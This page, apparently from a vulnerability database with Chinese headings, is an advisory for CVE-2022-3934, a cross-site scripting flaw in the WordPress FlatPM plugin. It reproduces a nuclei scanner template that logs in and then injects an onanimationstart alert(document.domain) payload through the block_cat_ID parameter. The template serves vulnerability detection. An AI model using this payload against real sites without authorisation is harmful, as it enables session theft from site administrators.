CVE-2022-3934: WordPress FlatPM <3.0.13 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress FlatPM | POC: 已公开

漏洞描述

WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2022-3934

info:
  name: WordPress FlatPM <3.0.13 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 3.0.13.
  reference:
    - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3934
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-3934
    cwe-id: CWE-79
    epss-score: 0.30139
    epss-percentile: 0.9653
    cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mehanoid
    product: flat_pm
    framework: wordpress
  tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
        condition: and
# digest: 4b0a00483046022100f220328e2d9b9b3e544e84669030071ffee5f186bd6b16e2bba8046e91130c3c0221008dc913fdaf8234591f21b49277a5817270f61a550f71d7df8156e085b0537604:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3934.yaml